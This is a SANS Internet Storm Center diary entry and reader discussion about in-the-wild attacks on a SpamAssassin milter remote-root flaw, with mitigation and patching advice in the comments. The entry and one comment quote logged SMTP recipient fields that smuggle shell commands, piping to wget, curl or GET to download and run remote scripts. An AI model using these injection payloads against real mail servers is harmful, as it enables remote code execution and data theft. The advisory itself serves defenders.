Threat Level: green Handler on Duty: Russ McRee

SANS ISC: Spamassassin Milter Plugin Remote Root Attack - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Spamassassin Milter Plugin Remote Root Attack

Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt;perl p.txt:   smtp.target.com[10.11.17.18] : User unknown in local recipient
       table; from=<blue@attacker.com> to=<root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)

Handler Bojan notes that it appears that the bad guys have started to actively exploit SpamAssassin's milter vulnerability that has been published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).

The perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80 -- this host appears to be unreachable at the moment though.

Cheers,
Adrien de Beaupré
EWA-Canada.com

 

Adrien de Beaupre

353 Posts
ISC Handler
On FreeBSD, a fix hasn't yet made it into ports. Is there any mitigation against this attack aside from disabling spamass-milter for the time being?
parseword

9 Posts
I'm using spamass-milter on CentOS 5.x (a.k.a. Red Hat Enterprise Linux). Fortunately, the RPM as distributed by Red Hat doesn't use the "-x" flag. *whew* Just check your /etc/sysconfig/spamass-milter EXTRA_FLAGS to see if you added it yourself.

To double-check I attempted the exploit described at the Full Disclosure link (above) and it didn't work.
parseword
3 Posts
I havve logged attempts to use curl as well.

rcpt to: root+:"|wget http://213.186.44.xxx/blue.php"

rcpt to: root+:"|wget http://61.100.185.xxx/busy-1.php"
rcpt to: root+:"|GET http://61.100.185.xxx/busy-2.php"
rcpt to: root+:"|curl http://61.100.185.xxx/busy-3.php"
Travis

5 Posts
@BillBixby: The preliminary patch linked to in the article applies nicely within the port. Just copy it to ${PORTSDIR}/mail/spamass-milter/files/patch-popen and force a rebuild and reinstall of spamass-milter. Tested here on a couple of MTAs (8R-p2 base Sendmail).
Matt

7 Posts

Sign Up for Free or Log In to start participating in the conversation!